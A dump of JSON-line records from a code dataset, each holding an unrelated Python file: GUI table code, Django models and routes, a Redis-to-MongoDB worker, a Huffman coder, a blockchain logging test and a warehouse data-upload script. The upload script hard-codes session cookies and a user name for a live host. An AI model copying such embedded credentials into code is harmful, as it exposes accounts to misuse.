self.model.dataChanged.connect(self.on_model_dataChange)\r\n\r\n        self.clearDataAction.triggered.connect(self.on_clearDataAction_trigger)\r\n        self.reloadDataAction.triggered.connect(self.on_reloadDataAction_trigger)\r\n        self.copyDataAction.triggered.connect(self.on_copyDataAction_trigger)\r\n        self.appendAndEditAction.triggered.connect(self.on_appendAndEditAction_trigger)\r\n        self.appendAndEditWithSignatureAction.triggered.connect(self.on_appendAndEditWithSignatureAction_trigger)\r\n        self.writeNullValueAction.triggered.connect(self.on_writeNullValueAction_trigger)\r\n\r\n        self.model.modelReset.connect(self.on_model_modelReset)\r\n\r\n    def set_new_data(self, psrs, filter_text):\r\n        psr_types = set([psr.get_field_by_field_group('psr_type').current_data for psr in psrs if psr.get_field_by_field_group('psr_type') is not None])\r\n\r\n        if len(psr_types) == 1 and '' not in psr_types:\r\n            self.show()\r\n\r\n            self.model.beginResetModel()\r\n\r\n            self.model.psrs = psrs\r\n\r\n            filters = [filter.strip() for filter in str(filter_text).lower().split(',') if filter.strip() != '']\r\n\r\n            if len(filters) != 0:\r\n                
self.model.filtered_indexes = []\r\n\r\n for filter in filters:\r\n for i, field in enumerate(psrs[0].fields):\r\n if filter in field.display_name.lower() and i not in self.model.filtered_indexes:\r\n self.model.filtered_indexes.append(i)\r\n else:\r\n self.model.filtered_indexes = xrange(len(psrs[0].fields))\r\n\r\n self.model.endResetModel()\r\n\r\n else:\r\n self.hide()\r\n\r\n self.reflow_layout()\r\n\r\n def reflow_layout(self):\r\n for i in xrange(self.horizontalHeader().count()):\r\n self.horizontalHeader().setResizeMode(i, QtGui.QHeaderView.Stretch)\r\n self.resizeRowsToContents()\r\n\r\n def on_model_dataChange(self, topLeft, bottomRight):\r\n self.reflow_layout()\r\n\r\n def on_model_modelReset(self):\r\n self.reflow_layout()\r\n\r\n def contextMenuEvent(self, event):\r\n contextMenu = QtGui.QMenu(self)\r\n\r\n if self.model.data(self.currentIndex(), role = QtCore.Qt.DecorationRole) is not None:\r\n contextMenu.addAction(self.clearDataAction)\r\n\r\n # Append and Edit Action, Write Null Value Action\r\n editable_item_selected = self.model.flags(self.currentIndex()) & QtCore.Qt.ItemIsEditable == QtCore.Qt.ItemIsEditable\r\n if editable_item_selected:\r\n contextMenu.addAction(self.appendAndEditAction)\r\n contextMenu.addAction(self.appendAndEditWithSignatureAction)\r\n contextMenu.addAction(self.writeNullValueAction)\r\n\r\n contextMenu.addSeparator()\r\n\r\n # Copy Selected Data Action\r\n contextMenu.addAction(self.copyDataAction)\r\n\r\n contextMenu.popup(self.viewport().mapToGlobal(event.pos()))\r\n\r\n def on_clearDataAction_trigger(self):\r\n for index in self.selectedIndexes():\r\n self.model.setData(index, None)\r\n\r\n def on_copyDataAction_trigger(self):\r\n '''\r\n Copies the selected cell contents to clipboard in a format that is parse-able by Excel.\r\n Note that if an extended selection is made, this will copy all interim cell contents!\r\n '''\r\n def code():\r\n if len(self.selectedIndexes()) == 1: # If only one cell is selected, simply copy it's contents to the clipboard.\r\n QtGui.QApplication.clipboard().setText(self.model.data(self.currentIndex()))\r\n\r\n else: # If more than one cell is selected, we need to check some things\r\n top_left = self.selectedIndexes()[0]\r\n bottom_right = self.selectedIndexes()[-1]\r\n\r\n import StringIO, csv\r\n\r\n csv_string = StringIO.StringIO()\r\n csv_writer = csv.writer(csv_string)\r\n\r\n # Determine if only a single row or a single column of cells is selected.\r\n # If true, we will not be copying header data.\r\n single_row_or_column = ( top_left.row() == bottom_right.row()) or (top_left.column() == bottom_right.column() )\r\n\r\n if not single_row_or_column:\r\n horizontal_headers = [self.model.headerData(section, orientation = QtCore.Qt.Horizontal) for section in range(top_left.column(), bottom_right.column()+1)]\r\n csv_writer.writerow([''] + horizontal_headers)\r\n\r\n for row_i in xrange(top_left.row(), bottom_right.row()+1):\r\n row_indexes = [self.model.index(row_i, j) for j in range(top_left.column(), bottom_right.column()+1)]\r\n\r\n row_to_write = [self.model.data(index).toUtf8() for index in row_indexes]\r\n if not single_row_or_column:\r\n row_to_write.insert(0, self.model.headerData(row_i, orientation = QtCore.Qt.Vertical))\r\n\r\n csv_writer.writerow(row_to_write)\r\n\r\n QtGui.QApplication.clipboard().setText(csv_string.getvalue())\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def on_appendAndEditAction_trigger(self):\r\n def code():\r\n current_index = 
self.currentIndex()\r\n\r\n current_data = self.model.psrs[0].fields[self.model.filtered_indexes[current_index.row()]].current_data\r\n\r\n self.model.setData(current_index, current_data)\r\n\r\n self.edit(current_index)\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def on_appendAndEditWithSignatureAction_trigger(self):\r\n '''Append and Edit with Signature, only if the field is of type \"text_area\". Otherwise, simply append and edit.'''\r\n def code():\r\n current_index = self.currentIndex()\r\n current_data = self.model.psrs[0].fields[self.model.filtered_indexes[current_index.row()]].current_data\r\n if self.model.psrs[0].fields[self.model.filtered_indexes[current_index.row()]].write_element_type == WriteElementTypes.text_area:\r\n self.model.setData(current_index, current_data + u'\\n\\n{} {} - '.format(asset.credentials()['Abbreviated Name'], datetime.now().strftime('%m/%d/%Y')))\r\n else:\r\n self.model.setData(current_index, current_data)\r\n self.edit(current_index)\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def on_writeNullValueAction_trigger(self):\r\n def code():\r\n self.model.setData(self.currentIndex(), QtCore.QString(''))\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def keyPressEvent(self, event):\r\n if event.matches(QtGui.QKeySequence.Copy):\r\n self.on_copyDataAction_trigger()\r\n else:\r\n super(PSRRawDataTableView, self).keyPressEvent(event)\r\n\r\n def on_reloadDataAction_trigger(self):\r\n pass\r\n","sub_path":"widget/finale/obj/psr_raw_data_table_view.py","file_name":"psr_raw_data_table_view.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61845643","text":"\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nfrom PIL import Image\nimport numpy as np\nfrom django.conf import settings\nfrom pathlib import Path\nimport os\nfrom .utils import get_oncho_images\nfrom .utils import get_schisto_images\nfrom .utils import get_lf_images\nfrom .utils import get_helminths_images\n\nfrom django.core.files.base import ContentFile\nfrom io import BytesIO\n\n# Create your models here.\nclass Test(models.Model):\n \n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=200, null=True, blank=True)\n age = models.IntegerField( null=True, blank=True)\n sex = models.CharField(max_length=200, null=True, blank=True)\n location = models.CharField(max_length=200, null=True, blank=True)\n created_at = models.DateField(auto_now=True)\n oncho =models.CharField(max_length=200, null=True, blank=True)\n schisto =models.CharField(max_length=200, null=True, blank=True)\n lf = models.CharField(max_length=200, null=True, blank=True)\n helminths = models.CharField(max_length=200, null=True, blank=True)\n \n onchoImage = models.ImageField(null=True,blank=True)\n schistoImage = models.ImageField(null=True,blank=True)\n lfImage = models.ImageField(null=True,blank=True)\n helminthsImage = models.ImageField(null=True,blank=True)\n \n \n def __str__(self):\n return self.name\n\n def getCount(self):\n ocount = self.oncho.count()\n\n\n\n\n def save(self, *args, **kwargs):\n \n \n \n #open image\n onc_img = Image.open(self.onchoImage)\n sch_img = Image.open(self.schistoImage)\n lf_img = Image.open(self.lfImage)\n hel_img = Image.open(self.helminthsImage)\n \n \n\n # convert image to array and process\n onc_img = np.array(onc_img)\n sch_img = 
np.array(sch_img)\n lf_img = np.array(lf_img)\n hel_img = np.array(hel_img)\n\n oncho_result = get_oncho_images(onc_img)\n sch_result = get_schisto_images(sch_img)\n lf_result = get_lf_images(lf_img)\n hel_result = get_helminths_images(hel_img)\n\n\n if oncho_result < 2 :\n \n print('Negative')\n self.oncho = \"Negative\"\n elif oncho_result == 2:\n \n self.oncho = \"Positive\"\n print('Positive')\n elif oncho_result> 2:\n self.oncho = \"Not Valid\"\n print('Not Valid')\n #schisto result\n if sch_result < 2 :\n \n print('Negative')\n self.schisto = \"Negative\"\n elif sch_result == 2:\n\n self.schisto = \"Positive\"\n print('Positive')\n elif sch_result> 2:\n self.schisto = \"Not Valid\"\n print('Not Valid')\n \n #lf result\n if lf_result < 2 :\n \n print('Negative')\n self.lf = \"Negative\"\n elif lf_result == 2:\n self.lf = \"Positive\"\n print('Positive')\n elif lf_result> 2:\n self.lf = \"Not Valid\"\n print('Not Valid')\n \n #helminths\n if hel_result < 2 :\n \n print('Negative')\n self.helminths = \"Negative\"\n elif hel_result == 2:\n \n self.helminths = \"Positive\"\n print('Positive')\n elif hel_result> 2:\n self.helminths = \"Not Valid\"\n print('Not Valid')\n \n\n \n \n \n super().save(*args, **kwargs) # Call the \"real\" save() method.\n # do_something_else()\n \n\n\n\n\n\n# from django.contrib.staticfiles.storage import staticfiles_storage\n# from django.db import models\n# from django.contrib.auth.models import User\n# import cv2\n# from PIL import Image\n# import numpy as np\n# from django.conf import settings\n# from django.core.files.storage import get_storage_class\n# from .utils import get_images\n# from io import BytesIO\n# # Create your models here.\n# class Test(models.Model):\n# user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n# name = models.CharField(max_length=200, null=True, blank=True)\n# age = models.IntegerField( null=True, blank=True)\n# sex = models.CharField(max_length=200, null=True, blank=True)\n# location = models.CharField(max_length=200, null=True, blank=True)\n# onchoImage = models.ImageField(upload_to='images')\n# pil_img = Image.open(onchoImage)\n# # img_name = pil_img.filename\n# # print('image name is' +img_name)\n\n# # convert image to array and process\n# cv_img = np.array(pil_img)\n# img = get_images(cv_img)\n\n# img = get_images(cv_img)\n\n \n \n# if img < 2 :\n# oncho =models.CharField(max_length=200, default='Negative')\n# elif img== 2:\n# oncho =models.CharField(max_length=200,default='Positive')\n# elif img > 2:\n# oncho =models.CharField(max_length=200,default='Not Valid')\n \n# print('number of lines in test is ', img)\n# schisto =models.CharField(max_length=200, null=True, blank=True)\n# lf = models.CharField(max_length=200, null=True, blank=True)\n# helminths = models.CharField(max_length=200, null=True, blank=True)\n# enteredAt = models.DateTimeField(auto_now_add=True)\n \n# schistoImage = models.ImageField(null=True,blank=True)\n# lfImage = models.ImageField(null=True,blank=True)\n# helminthsImage = models.ImageField(null=True,blank=True)\n \n \n# def __str__(self):\n# return self.name\n# def save(self, *args, **kwargs):\n \n# #open image\n\n# pil_img = Image.open(self.onchoImage)\n# # img_name = pil_img.filename\n# # print('image name is' +img_name)\n\n# # convert image to array and process\n# cv_img = np.array(pil_img)\n# img = get_images(cv_img)\n\n# # #conver back to image\n# # im_pil = Image.fromarray(img)\n \n\n# # print('number of lines in test is ', len(contours)/2 )\n\n# # if img== 0:\n# # oncho_value = 
\"Not Valid 0\"\n\n\n#         super().save(*args, **kwargs) # Call the \"real\" save() method.\n# #         do_something_else()\n\n\n\n","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"121084976","text":"#!/usr/bin/python2\n\"\"\"worker to read presence records from redis and write to mongodb\"\"\"\n\nfrom pymongo import MongoClient\nimport syslog\nimport redis\nimport json\nimport time\nimport datetime\nfrom argparse import ArgumentParser\n\n#from riemann import RiemannClient, RiemannUDPTransport\n\n#rmmonitor = RiemannClient(transport = RiemannUDPTransport,\n#host=config.riemann['host'])\n\n#ok_response = {'status': 'ok'}\n\nINQNAME = \"oemap_db_worker_in_queue\"\nREPLYTO = \"oemap_www_nodejs_in_queue\"\n\nclass DbWorker():\n    \n    def __init__ (self):\n\n        parser = ArgumentParser()\n        parser.add_argument('-n', '--job', dest='job', action='store', \n            help='worker instance id')\n        self.args = parser.parse_args()\n        self.rhost = \"127.0.0.1\"\n        self.rport = 6379\n        self.starttime = datetime.datetime.now()\n        self.statc = 0\n        self.stati = 0\n        self.database = None\n    \n    def stats(self):\n        self.statc = self.statc + 1\n        self.stati = self.stati + 1\n        if self.stati == 10000:\n            now = datetime.datetime.now()\n            dur = now - self.starttime\n            rate = ''\n            if dur.seconds > 0:\n                rate = str(self.stati / dur.seconds) + \" per second\"\n            else:\n                rate = \"1000+ per second\"\n            self.log_notice(\"processed %s records. rate was %s.\" % \n                (self.statc, rate))\n            self.stati = 0\n            self.starttime = now\n    \n    FIVE_MIN_IN_SECS = 60 * 5\n    ONE_HOUR_IN_SECS = 60 * 60\n    ONE_DAY_IN_SECS = ONE_HOUR_IN_SECS * 24\n\n    def setExpireTime(self, rec):\n        now = datetime.datetime.now()\n        ttl = rec['ttl']\n        # the *_IN_SECS values are class attributes, so they must be reached through self\n        if ttl == 1:\n            rec['exp_time'] = now + datetime.timedelta(0, self.FIVE_MIN_IN_SECS)\n        elif ttl == 2:\n            rec['exp_time'] = now + datetime.timedelta(0, self.ONE_HOUR_IN_SECS)\n        elif ttl == 3:\n            rec['exp_time'] = now + datetime.timedelta(0, self.ONE_DAY_IN_SECS)\n        else:\n            rec['exp_time'] = now # ready for sweeper\n\n    def run (self):\n\n        while True:\n            try:\n                self.log_notice('%s Python impl starting queue %s' % (\"test\", INQNAME))\n                \n                rdis = redis.Redis(host=self.rhost, port=self.rport)\n                client = MongoClient()\n                self.database = client.oemap_test\n                \n                while True:\n                    \n                    # brpop returns None on timeout, so check before unpacking\n                    popped = rdis.brpop(keys=[INQNAME], timeout=600)\n                    \n                    if popped is None: \n                        continue\n                    \n                    (_, msg) = popped\n                    \n                    rec = json.loads(msg)\n                    \n                    self.log_debug(\"updating %s for %s\" % (rec['_id'], \n                        rec['label']))\n\n                    self.setExpireTime(rec)\n                    \n                    self.database.presences.save(rec)\n                    \n                    self.stats()\n                \n            except Exception:\n                self.handle_exception()\n                time.sleep(1)\n            except: # catch *all* exceptions\n                self.handle_exception()\n                time.sleep(1)\n    \n    def log_debug (self, msg):\n        syslog.syslog(syslog.LOG_DEBUG, \"%s %s\" % (self.args.job, msg))\n\n    def log_notice (self, msg):\n        syslog.syslog(syslog.LOG_NOTICE, \"%s %s\" % (self.args.job, msg))\n\n    def log_error (self, msg):\n        syslog.syslog(syslog.LOG_ERR, \"%s %s\" % (self.args.job, msg))\n\n    def handle_exception(self):\n        import traceback\n        formatted_lines = traceback.format_exc().splitlines()\n        for line in formatted_lines:\n            self.log_error(line)\n\nif __name__ == \"__main__\":\n\n    DbWorker().run()\n\n","sub_path":"modules/db_worker/DbWorker.py","file_name":"DbWorker.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"63172350","text":"#!/usr/bin/env 
python3\n\nimport argparse\nimport re\nimport soundex\nimport string\nimport sys\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Use Soundex to find rhyming words',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('word', metavar='str', help='Word')\n\n parser.add_argument('-w',\n '--wordlist',\n metavar='str',\n help='Wordlist',\n default='/usr/share/dict/words')\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n args = get_args()\n word = args.word\n wordlist = args.wordlist\n\n stem = word\n consonants = [c for c in string.ascii_lowercase if c not in 'aeiou']\n regex = re.compile('^[' + ''.join(consonants) + ']+(.+)')\n\n def stemmer(word):\n match = regex.search(word)\n return match.group(1) if match else word\n\n sndx = soundex.Soundex()\n cmp = sndx.soundex(stemmer(word))\n\n for line in open(wordlist):\n for w in line.split():\n if w != word and sndx.soundex(stemmer(w)) == cmp:\n print(w)\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"soundex_rhymer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"148743455","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Created on 2019-08-08 15:31\nfrom django.conf.urls import url\n\nfrom Admin import views\n\nurlpatterns = [\n # 左侧边栏路由\n\n url(r'^home/$', views.home, name='home'),\n url(r'^user/$', views.user, name='user'),\n url(r'^user/(\\d+)/$', views.user, name='user1'),\n url(r'^music/(\\d+)/(\\d+)/$', views.music, name='music'),\n url(r'^musmv/$', views.musmv, name='musmv'),\n url(r'^musmv/(\\d+)/$', views.musmv, name='musmv1'),\n\n url(r'^point/$', views.point, name='point'),\n url(r'^adlog/$', views.adlog, name='adlog'),\n url(r'^pastlog/$', views.pastlog, name='pastlog'),\n url(r'^dellog/$', views.dellog, name='dellog'),\n\n\n url(r'^spread/$', views.spread, name='spread'),\n url(r'^location/$', views.location, name='location'),\n url(r'^staruser/$', views.staruser, name='staruser'),\n url(r'^documentation/$', views.documentation, name='documentation'),\n url(r'^feedback/(\\d+)$', views.feedback, name='feedback'),\n url(r'^translation/$', views.translation, name='translation'),\n\n # 登录路由\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n\n # 管理员管理用户url\n url(r'^add/$', views.add, name='add'),\n url(r'^select/$', views.select, name='select'),\n url(r'^select/(\\d+)/$', views.select, name='select1'),\n url(r'^comeback_user/$', views.comeback_user, name='comeback_user'),\n url(r'^select2/(\\d+)/$', views.select2, name='select2'),\n url(r'^addsuccess/$', views.add_success, name='add_success'),\n url(r'^showall/(\\w+)$', views.show_all, name='show_all'),\n url(r'^dorecover/(\\w+)$', views.do_recover, name='do_recover'),\n url(r'^dodelete/(\\w+)$', views.do_delete, name='do_delete'),\n url(r'^doupdate/(\\w+)$', views.do_update, name='do_update'),\n\n # 管理员管理mv\n url(r'^showmvall/(\\w+)$', views.show_allmv, name='show_mvall'),\n url(r'^show_mvall_select/$', views.show_allmv_select, name='show_mvall_select1'),\n url(r'^show_mvall_select/(\\w+)$', views.show_allmv_select, name='show_mvall_select'),\n url(r'^show_allmv_select_next/(\\w+)$', 
views.show_allmv_select_next, name='show_allmv_select_next'),\n url(r'^mv_recover/(\\w+)$', views.mv_recorver, name='mv_recover'),\n url(r'^mv_delete/(\\w+)$', views.mv_delete, name='mv_delete'),\n url(r'^mv_upgrade/(\\w+)$', views.mv_upgrade, name='mv_upgrade'),\n\n url(r'show_music_all/(\\d+)/(\\d+)/$', views.show_music_all, name='show_music_all'),\n url(r'delete_email/(\\d+)/$', views.delete_email, name='delete_email'),\n url(r'reply_email/(.+)/$', views.reply_email, name='reply_email'),\n\n # url(r'mytest/$', views.test, name='mytest')\n\n]\n","sub_path":"Admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"195082719","text":"import requests\nimport json\nimport xlrd\n\n# 为lot表和location_inventory添加商品库位数据 空库位盘盈接口 path = 'D:/dataInsert/tf/111.xlsx'\n\n\n# excel所有内容\nlist = []\n# 目录数据\ncategory_code_id_dicts = {}\ncategory_code_path_dicts = {}\ncategory_code_name_dicts = {}\nbrand_name_id_dicts = {}\n# url http://wms.365sslunch.com/owms-web/locationInventory/emptySpaceExtraAdjust\n# payload {\"toQty\":\"5\",\"toLocationCode\":\"C-02C9\",\"toStatus\":\"normal\",\"lotTemplateId\":null,\"itemId\":994794,\"lotAttrValue\":\"{}\",\"toCargownerId\":1088961,\"toCargownerCode\":\"TFSP\"}\n# response {\"code\":\"0\",\"message\":\"成功\"}\n# 空库位盘盈请求头\nheadersAdd = {\n 'Host': 'wms.365sslunch.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\n 'Accept': 'application/json, text/plain, */*',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': 'http://wms.365sslunch.com/',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Content-Length': '165',\n 'Connection': 'keep-alive',\n 'Cookie': 'user_name=xiangqi; company_code=tianfang; id=90; UT=USER_SESSION_xiangqi_PLATFORM_0',\n 'Origin': 'http://wms.365sslunch.com'\n}\n\n# url http://wms.365sslunch.com/owms-web/item/listPage\n# payload {\"page\":1,\"limit\":10,\"filters\":{\"code\":\"33040371\",\"name\":\"\"}}\n# response {code: \"0\", message: \"成功\", totalPages: 1, total: 1,…}\n # code: \"0\"\n # data: [{id: 994794, createUserid: 113, createTime: \"2019-07-04 14:16:04\", updateUserid: null,…}]\n # message: \"成功\"\n # total: 1\n # totalPages: 1\n# 拉去itemId 请求头\nheadersQuery = {\n 'Host': 'wms.365sslunch.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\n 'Accept': 'application/json, text/plain, */*',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': 'http://wms.365sslunch.com/',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Content-Length': '61',\n 'Connection': 'keep-alive',\n 'Cookie': 'user_name=xiangqi; company_code=tianfang; id=90; UT=USER_SESSION_xiangqi_PLATFORM_0',\n 'Origin': 'http://wms.365sslunch.com'\n}\n\n\ndef read_excel():\n path = 'D:/dataInsert/tf/111.xlsx'\n # 打开execl\n workbook = xlrd.open_workbook(path)\n # 根据sheet索引或者名称获取sheet内容\n Data_sheet = workbook.sheets()[0] # 通过索引获取\n rowNum = Data_sheet.nrows # sheet行数\n colNum = Data_sheet.ncols # sheet列数\n\n # 获取所有单元格的内容\n for i in range(rowNum):\n if i == 0:\n continue\n rowlist = []\n for j in range(colNum):\n rowlist.append(Data_sheet.cell_value(i, j))\n list.append(rowlist)\n\n\ndef exec(one_row):\n\n # 商品导入\n item_code = str(one_row[2]).split('.')[0]\n item_desc = 
one_row[3].replace(\"\\\"\",\"\")\n forien_desc = one_row[4]\n category = one_row[5]\n house_code = str(one_row[7]).split('.')[0]\n house_name = one_row[8]\n to_qty = one_row[9]\n uom = one_row[10]\n\n # 查询商品id\n base_data = '{\"page\":1,\"limit\":10,\"filters\":{\"code\":\"%s\",\"name\":\"\"}}' % item_code\n url = 'http://wms.365sslunch.com/owms-web/item/listPage'\n r = requests.post(url, headers=headersQuery, data=str(base_data).encode(\"utf-8\"))\n item_id = json.loads(r.text)['data'][0]['id']\n print(item_id)\n\n # 空库位盘盈 库位处理house_code 例如 301 处理为 3-0-1\n house_code = '-'.join(house_code)\n url = 'http://wms.365sslunch.com/owms-web/locationInventory/emptySpaceExtraAdjust'\n base_data = '{\"toQty\":\"%s\",\"toLocationCode\":\"%s\",\"toStatus\":\"normal\",\"lotTemplateId\":null,\"itemId\":\"%s\",\"lotAttrValue\":\"{}\",\"toCargownerId\":1088961,\"toCargownerCode\":\"TFSP\"}' % (to_qty,house_code,item_id)\n a = requests.post(url, headers=headersAdd, data=str(base_data).encode(\"utf-8\"))\n print(a.text)\n\nif __name__ == '__main__':\n read_excel()\n for one_row in list:\n try :\n exec(one_row)\n except:\n print('err')\n continue","sub_path":"tf/product2.py","file_name":"product2.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"508986900","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\n\nwith open('README.txt') as file:\n long_description = file.read()\n\nsetup(name='dockyard',\n version='0.2',\n description='Light-weight CLI for development using Vagrant + Docker',\n long_description=long_description,\n author='Joshua Bellamy-Henn',\n author_email='josh@psidox.com',\n url='https://github.com/smysnk/dockyard',\n install_requires=['python-vagrant>=0.5.0', 'docker-py>=0.3.2'],\n keywords=\"docker vagrant dockyard\",\n packages=find_packages(),\n entry_points={\n 'console_scripts':\n ['dockyard = dockyard.entry:main'],\n }\n )","sub_path":"pypi_install_script/dockyard-0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609436186","text":"\"\"\"a method for the construction of minimum-redundancy codes. 
Huffman\"\"\"\n\nfrom bit_array import BitArray\nfrom huffman_trie import HuffmanTrie\n\nfrom collections import defaultdict, Counter\nfrom heapq import heappush, heappop, heapify\n\n\nclass HuffmanCode(object):\n \"\"\"allows object encoding and decoding\"\"\"\n def __init__(self, message):\n self.code = self.generate_code(self.to_frequency(Counter(message)))\n self.sym_length = defaultdict(int)\n for (sym, bin_code) in self.code.items():\n self.sym_length[sym] = len(bin_code)\n\n def to_frequency(self, symbol_count):\n \"\"\"get the frequency of each symbol in the message\"\"\"\n frequencies = []\n total = sum(symbol_count.values())\n for (symbol, count) in symbol_count.items():\n frequencies.append((count / total, [symbol]))\n return frequencies\n\n def generate_code(self, frequency_table):\n \"\"\"generates binary code for each symbol\n use the exact same encoding as in the article\"\"\"\n heapify(frequency_table)\n code = defaultdict(list)\n while len(frequency_table) > 1:\n one = heappop(frequency_table)\n zero = heappop(frequency_table)\n for sym in one[1]:\n code[sym].append(1)\n for sym in zero[1]:\n code[sym].append(0)\n heappush(frequency_table, (one[0] + zero[0], one[1] + zero[1]))\n sym_to_string = defaultdict(str)\n for (symbol, binary) in code.items():\n bin_str = \"\".join([str(i) for i in reversed(binary)])\n sym_to_string[symbol] = bin_str\n return sym_to_string\n\n def encode(self, message):\n \"\"\"huffman code the message into bits\"\"\"\n bit_size = 0\n for sym in message:\n bit_size += self.sym_length[sym]\n\n bit_array = BitArray(bit_size)\n\n position = 0\n for sym in message:\n for bit in self.code[sym]:\n if bit == '1':\n bit_array.set_bit(position)\n position += 1\n\n return bit_array\n\n def decode(self, bit_array):\n \"\"\"decode the message previously encoded with the code\"\"\"\n assert isinstance(bit_array, BitArray)\n decode_trie = HuffmanTrie()\n for (symbol, code) in self.code.items():\n decode_trie.add_code(symbol, code)\n\n return decode_trie.decode(bit_array.get_bits())\n\n\n__all__ = [\"HuffmanCode\"]\n","sub_path":"src/huffman_code.py","file_name":"huffman_code.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"189636482","text":"import sys, os\nmyPath = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, myPath + '/../PDS/')\n\nimport pytest\nimport asyncio\nimport json\nimport base64\n\nfrom web3 import Web3\nfrom pds import PDS\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef deploy_ganache():\n import subprocess\n import time\n global w3, abi, account, address\n p1 = subprocess.Popen(['ganache-cli', '-m', 'myth like bonus scare over problem client lizard pioneer submit female collect']) #use this mnemonic to much the contract address in configuration\n time.sleep(10) #Otherwise the server is not ready when tests start\n w3 = Web3(Web3.HTTPProvider(\"HTTP://127.0.0.1:8545\"))\n with open('conf/contract/build/PDS.abi', 'r') as myfile:\n abi = myfile.read()\n with open('conf/contract/build/PDS.bin', 'r') as myfile:\n binfile = myfile.read()\n account = w3.eth.accounts[0]\n PDSContract = w3.eth.contract(abi=abi, bytecode=binfile)\n tx_hash = PDSContract.constructor().transact({'from': account})\n tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)\n address = tx_receipt.contractAddress\n yield\n p1.kill()\n\n@pytest.mark.asyncio\nasync def test_log_token():\n global w3, abi, account, address\n pds = PDS()\n logged_token = 
'Od7Fsc5Z68fSaC4PNu0t1eXYr8tI7no28aXjCEypjxjohc0PwkItlVTjCduAOwlwg3gtIdcSXufv5WYuowoV9Hak8yWMy_74SZe06Fs4DfrMRDJZsAXSYac08tmTvu440VkXfZwZ7NouoQbZgMCzPL6jxKWwV2hN06ti4GCFRR6TbymgZeFroeTH3WT9iM-Lo1mtr0bWsH93qsXIlHK0IOaMwskjPJHSKwOoFIW84DFHSHY0TdUn8U_fKz55oEwd5x5WyHeu_OVVqO03GgToZN_tPp_6vjxDPtwzHZYRmiYX08oWKotHAPGloqyMmt3MHOlwag1YFHcxMvHx0Gw9t6NUHRMhU3J9EEhE4UgS6Ol-G9ea-qeCRc_WEzgMukjfxb-wGfPCRFlNyYOJt1XxI2whTbKj_wao0kN17NHIT6suFPEDnW7DBsyYEG8cXO5MLzKkDplLSVnet7xTWMmnPlm6yR8hwXeE0MHjpWeLu0Lw-uJ6aKu2fVla-aaD8d6w05MFURsgiUwjjSf7omlABeuI6KCQWO_rTqSPZ4yx7e7GO7YY4cvpw1IxK1jbxHVaY-8dCHyXyDCUhBXvfGJXHJx--n-KyLVo7tXy5dbd2j4K8-MD0EDTPmbar8OBnlyKO5rG9PqWOjEkEcu8t-WfGpbTcw=='\n logged_did = '4qk3Ab43ufPQVif4GAzLUW'\n PDSContract_instance = w3.eth.contract(abi=abi, address=address)\n code, result = pds.log_token(logged_did, logged_token, w3, account, PDSContract_instance)\n DID, enc_token = PDSContract_instance.functions.get_token(0).call()\n assert (DID != None)\n assert (enc_token != None)","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55347589","text":"\"\"\"\nEndpoints for reminders and daily messages\n\"\"\"\nimport datetime\nimport os\nimport pickle\nimport random\nfrom fastapi import FastAPI\nfrom messages import reminders\nfrom messages import senior_qa_training\napp = FastAPI()\n\nCURR_FILE_PATH = os.path.dirname(os.path.abspath(__file__))\nMESSAGES_PATH = os.path.join(CURR_FILE_PATH, 'messages')\nCULTURE_FILE = os.path.join(MESSAGES_PATH, 'culture.txt')\nSEP20_INTERNS_FILE = 